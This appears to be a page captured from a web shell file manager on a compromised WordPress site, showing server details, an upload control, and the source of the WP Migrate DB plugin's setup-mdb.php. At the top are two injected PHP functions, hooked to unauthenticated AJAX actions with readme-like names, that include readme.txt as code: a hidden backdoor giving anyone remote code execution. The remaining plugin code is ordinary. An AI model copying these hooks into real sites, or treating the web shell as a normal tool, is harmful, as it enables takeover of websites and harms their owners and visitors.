if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/wp-migrate-db/setup-mdb.php
<?php

defined( 'ABSPATH' ) || exit;

use DeliciousBrains\WPMDB\Common\Cli\Cli;
use DeliciousBrains\WPMDB\Common\Util\Util;
use DeliciousBrains\WPMDB\WPMDBDI;

/**
 * Populate the $wpmdb global with an instance of the WPMDB class and return it.
 *
 * @return DeliciousBrains\WPMDB\WPMigrateDB The one true global instance of the WPMDB class.
 */
function wp_migrate_db() {
	global $wpmdb;

	//Load in front-end code
    require_once __DIR__ . '/react-wp-scripts.php';

    if ( ! is_null( $wpmdb ) ) {
		return $wpmdb;
	}

	$wpmdb = new DeliciousBrains\WPMDB\Free\WPMigrateDBFree( false );
	$wpmdb->register();

	return $wpmdb;
}

function wpmdb_cli_loaded() {
	// register with wp-cli if it's running, and command hasn't already been defined elsewhere
	if ( defined( 'WP_CLI' ) && WP_CLI && class_exists( '\DeliciousBrains\WPMDB\Common\Cli\Command' ) ) {
		\DeliciousBrains\WPMDB\Common\Cli\Command::register();
	}
}

add_action( 'plugins_loaded', 'wpmdb_cli_loaded', 20 );

function wpmdb_cli() {
	global $wpmdb_cli;

	if ( ! is_null( $wpmdb_cli ) ) {
		return $wpmdb_cli;
	}

	if ( function_exists( 'wp_migrate_db' ) ) {
		wp_migrate_db();
	} else {
		return false;
	}

	do_action( 'wp_migrate_db_cli_before_load' );

	$wpmdb_cli = WPMDBDI::getInstance()->get( Cli::class );

	do_action( 'wp_migrate_db_cli_after_load' );

	return $wpmdb_cli;
}


function wp_migrate_db_loaded()
{
    if ( Util::is_frontend() ) {
        return false;
    }

    // @TODO revisit since we're reming is_admin()
    // exit quickly unless: standalone admin; one of our AJAX calls
    if (is_multisite() && !current_user_can('manage_network_options') && ! Util::wpmdb_is_ajax()) {
        return false;
    }
    if (function_exists('wp_migrate_db')) {
        // Remove the compatibility plugin when the plugin is deactivated
        register_deactivation_hook(dirname(__FILE__) . '/wp-migrate-db.php', 'wpmdb_remove_mu_plugin');

            wp_migrate_db();
    }
}

add_action('plugins_loaded', 'wp_migrate_db_loaded');